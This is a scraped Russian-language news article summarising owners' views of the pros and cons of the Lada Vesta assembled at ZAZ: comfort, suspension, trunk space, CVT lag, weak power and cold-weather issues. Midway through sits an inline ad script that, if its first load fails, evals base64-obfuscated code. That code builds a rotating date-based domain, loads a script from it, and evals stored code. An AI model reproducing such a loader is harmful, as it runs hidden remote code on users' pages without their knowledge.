Автомобиль Lada Vesta, выпускаемая на ЗАЗ, получает множество как положительных, так и отрицательных отзывов владельцев из РФ.
Все дело в том, что недостатки и преимущества Lada (Vesta, Niva, Granta) одинаковы для автомобилей этих же самых моделей, которые производятся в Запорожье — на ЗАЗе: все они собираются из машинокомплектов, поставляемых из заводов РФ.
Данная модель — одна из трех представителей бренда LADA, производимых на Запорожском автомобильном заводе: кроме нее собирают еще модели Lada Niva и Lada Granta. Вдобавок, модель Веста заняла лидирующее 2-место в рейтинге самых популярных сделанных в Украине автомобилей, реализованных в ноябре текущего года. О том, какие еще машины производства ЗАЗ туда вошли — можно узнать в статье Портала Акцент.
Сделано в Украине: модели ЗАЗ попали в ТОП авто страны (ФОТО) Lada Vesta седан. Фото: АвтоЗАЗ
К слову, среди других брендов, на Запорожском автозаводе собирают Renault (модель Arkana) и Kia (модели Rio и Rio X).
7 недостатков Киа Рио, которую собирают на ЗАЗе: рассказ автовладельцев Названы 7 недостатков собираемой на ЗАЗ Рено Аркана Модель Lada Vesta SW Cross. Фото: Укравто
О главных плюсах и минусах Лада Веста, которую собирают на Запорожском автозаводе — читайте в статье Портала Акцент со ссылкой на За Рулем.
Lada Vesta: плюсы
Ход авто. Как отмечают большинство владельцев, автомобиль имеет комфортный, плавный, мягкий ход.
«Очень ровный разгон, никаких толчков и переключений, как бывает на АКП», — пишет владелец с ником Pamil77, проехавший на Ладе с вариатором 9000 км.
«Едет как иномарка — тихо, комфортно и вполне быстро», — отмечает автолюбитель ником step209.
«Вариатор работает плавно, в пробках просто отлично ездить на такой машине», — согласен с ним Николай, проехавший 10 тыс. км на седане.
Фото: Укравто Вариатор. Фото: Авторевю
Подвеска.
«Ощутил прелести хорошей подвески, по сравнению с Тойотами, которые до этого эксплуатировал — прямо небо и земля. Хотя у Тойот всегда менял все рычаги и детали подвески вовремя», — сравнивает автовладелец с ником 3895621.
«На дальней поездке участок дороги 150 км был разбит в хлам, как будто по шпалам едешь, но подвеска вела себя великолепно! Никаких толчков, в салоне мягко, тихо, плавно, как корабль плывет», — согласен с ним Николай, проехавший 10 тыс. км на седане.
Подвеска Лада Веста. Источник: Drive2
Шумоизоляция.
«В дальней поездке значимого шума не было, усталости от посторонних звуков не чувствовал. На мой взгляд, шумка в Весте лучше, чем в Фокусе, в котором я ездил в качестве пассажира», — отмечает автовладелец Николай.
«Шумка огонь, движка на холостых и малых оборотах не слышно вовсе, „коксу“ дашь, и слышно приятное урчание», — пишет автовладелец с ником 3895621.
Шумоизоляция Лада Веста. Источник: Drive2
Вместительность.
«Был приятно удивлен вместительностью багажника: влез детский велосипед без разборки, туристический стол и четыре сиденья, туристическая газовая плита, 4 баллона с газом по 250 мл. Четыре сумки с вещами, пакеты… Не ожидал, что в седан может поместиться такой объем», — пишет автолюбитель Николай.
«Багажник огромный, спокойно зайдет 3–4 баула по 50 кг, а если задние кресла сложить, то и ещё больше», — согласен автовладелец с ником 3895621.
«Холодильник-бардачок вместил 2 литра молока и еду для трех приемов пищи семьей из 4 человек в дальней поездке на 1000 км. Холодильник работает отлично, ничего не испортилось за 1000 км. К плюсам следует также отнести хороший кондиционер, который исправно функционировал все лето, пока держалась жара», — пишет Николай. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Багажник Лада Веста SW Cross. Источник: LadaOnline Багажник Лада Веста седан. Источник: gifka.net
Салон.
«И обзор отличный, поймал себя на мысли, что в заднее центральное зеркало вовсе не смотрю, в боковое левое и задний обзор виден, и что творится слева. Ну и радует куча примочек в виде датчиков дождя и света», — доволен автовладелец с ником 3895621.
«Штатная автомагнитола удивила качественным звуком. По крайней мере, в моём внедорожнике Toyota Harrier магнитола с динамиками „Bose“ звучала почти так же. Если этот автомобиль сравнивать с Ларгусом, то это небо и земля. Ларгус поколхозней во всём», — пишет Александр, который до покупки Весты SW Cross владел Ладой Ларгус и Тойотой.
Салон Лада Веста седан. Источник: Укравто Салон Лада Веста X Cross. Источник: Укравто Lada Vesta: минусы
Вариатор.
«Реакция на педаль газа мало того, что замедленная, так еще и непрогнозируемая. Захотел обогнать, нажал педаль газа посильнее, и ждешь „выстрела“ вперед, чтобы быстро опередить „тихохода“… Лишь через секунду после нажатия слышишь усилившийся рев мотора, еще через секунду примерно машина ускоряется. Но не быстро, как хотелось бы, а на некоторую величину, которую компьютер за эти две секунды вычислил. Причина задержки проста — электроника бережет вариатор от резких ускорений и торможений, поскольку это быстрее изнашивает основной приводной ремень», — именно по этой причине автолюбитель с ником step209 (опытный «ладолюб», как он сам себя называет) передумал покупать модель с вариатором.
«Эту особенность приходится учитывать при старте, хотя привыкаешь, и не сильно мешает», — согласен с ним владелец с ником 3895621, купивший Ладу Весту SW Cross в максимальной комплектации.
«Нет ползущего режима на вариаторе. Встал в горку, отпустил тормоз и через три секунды машина катится назад! На раздумье времени мало, отпустил тормоз — сразу жми на газ или будет беда. На всех моих бывших стареньких японках с вариком такого чуда не встречалось, он держал любой подъём» — пишет владелец Александр, купивший Весту SW Cross.
Вариатор на Весте идет в паре с 1,6-литровым 113-сильным двигателем H4M. Источник: ЗР
Мощность.
«113 «лошадей» — маловато для машины со снаряженной массой 1230–1350 кг», — считают авто владельцы. Из-за этого при обгонах маневр приходится тщательно рассчитывать.
«Возникли вопросы по динамике этого авто. Двигателю при полной загрузке (2 взрослых и 3 ребёнка) явно не хватает мощности на трассе. Обгоны даются с трудом. Да и в городе с динамичным движением не хватает тяги со старта. Надо резко ускориться — педаль в пол, а машина разгоняется вяло», — недоволен Александр.
«Обгоны вялые, поэтому нужно выбирать хорошо просматриваемые длинные свободные участки встречной», — предупреждает автолюбитель Николай.
Ранее Портал Акцент рассказывал, как производят запчасти для легковушек и как собирают новые автомобили.
Как собирают российские Lada на ЗАЗ и делают запчасти на Lanos и Aveo (ФОТО, ВИДЕО)
Комфорт водителя.
«Я не смог найти удобного положения за рулем при росте 176 см. В поездках по городу длительностью до 2 часов большого неудобства не чувствовал, однако в дальней поездке к 500 км у меня начала ужасно болеть шея. Через 1000 км шея просто отваливалась. Есть выдвижной поясничный упор, но заметного эффекта от него нет — поставил в выдвинутое положение. Тем, кто планирует приобрести машину для длительных поездок следует тщательно оценить комфорт в кресле водителя», — предупреждает Николай.
Водительское кресло. Источник: Укравто
Проблемы при морозах. Водитель Александр назвал следующие проблемы, возникающие при низких температурах:
«Автомобиль невозможно закрыть с заведённым двигателем. Ставить сигнализацию не хочу, будут сверчки в салоне, как на Ларгусе. Больше чем на час авто на улице не оставишь, иначе потом примёрзнешь к сиденью. Спасает подогрев сидушек, хоть за это спасибо.
«На морозе плохо закрывается крышка багажника. Меняйте смазку в замке, или делайте мощней пружину господа конструкторы».
Источник: Укравто
Как ранее сообщал Портал Акцент, Запорожский автомобилестроительный завод наращивает темпы производства автобусов: так, спрос на модели ЗАЗа растет не только на рынке Украины, но и за рубежом.
(adsbygoogle = window.adsbygoogle || []).push({});
На автобусы ЗАЗ растет спрос: какие модели производит завод Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/nazvany-plyusy-i-minusy-sobiraemoj-na-zaz-lada-vesta/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook